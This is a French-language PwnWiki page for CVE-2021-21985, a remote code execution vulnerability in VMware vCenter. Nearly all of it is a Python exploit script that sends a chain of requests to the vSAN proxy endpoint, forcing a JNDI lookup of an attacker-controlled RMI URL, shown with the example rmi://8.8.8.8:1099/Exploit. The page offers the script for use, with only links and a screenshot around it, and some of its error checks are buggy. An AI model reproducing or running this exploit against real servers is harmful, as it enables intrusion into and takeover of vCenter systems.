CVE-2021-21985 Vulnérabilité d'exécution de code arbitraire à distance VMware vCenter

From PwnWiki
Revision as of 09:51, 5 June 2021 by Pwnwiki (talk | contribs) (Created page with "==Référence==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎Deutsch • ‎English • ‎Türkçe • ‎español • ‎français • ‎português • ‎русский • ‎українська • ‎עברית • ‎العربية • ‎فارسی • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

Capture d'écran

Twitter E3CB24AUUAEl1 8.jpg


EXP

import requests
import sys
import json
def send_request(host,uri,json):
    try:
        req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)
        return req.text
    except:
        return False
def check_false(request):
    if request ==False or 'result' not in request:
        print("[*] No Vuln!")
        return True
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    host = sys.argv[1]
    payload = sys.argv[2]
    baseuri = "ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    uris = ["/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"]
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    stage_setTargetObject = json.loads('{"methodInput":[null]}')
    stage_setStaticMethod = json.loads('{"methodInput":["javax.naming.InitialContext.doLookup"]}')
    stage_setTargetMethod = json.loads('{"methodInput":["doLookup"]}')
    stage_setArguments = json.loads('{"methodInput":[["%s"]]}'%payload)
    stage_prepare = json.loads('{"methodInput":[]}')
    print("[*] start init TargetObject")
    # init TargetObject
    init_request  = send_request(host,uris[0],json=stage_setTargetObject)
    if check_false(init_request):
        print("[*] init failed!")
        exit()
    # Step2 setStaticMethod
    StaticMethod = send_request(host,uris[1],json=stage_setStaticMethod)
    if check_false(init_request):
        print("[*] StaticMethod init failed!")
        exit()
    # Step3 setTargetMethod
    StaticMethod = send_request(host,uris[2],json=stage_setTargetMethod)
    if check_false(init_request):
        print("[*] setTarget Method failed!")
        exit()
    # Step4 setArguments
    # print(stage_setArguments)
    setArguments = send_request(host,uris[3],json=stage_setArguments)
    if check_false(init_request):
        print("[*] setArguments failstage_setArgumentsed!")
        exit()
    # Step5 prepare
    setArguments = send_request(host,uris[4],json=stage_prepare)
    if check_false(init_request):
        print("[*] stage_prepare failed!")
        exit()
    # Step6 invoke
    setArguments = send_request(host,uris[5],json=stage_prepare)
    if check_false(init_request):
        print("[*] invoke failed!")
        exit()


Référence

https://github.com/xnianq/cve-2021-21985_exp/

https://twitter.com/_0xf4n9x_?s=21

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-21985_VMware_vCenter_遠程任意代碼執行漏洞/fr&oldid=4075"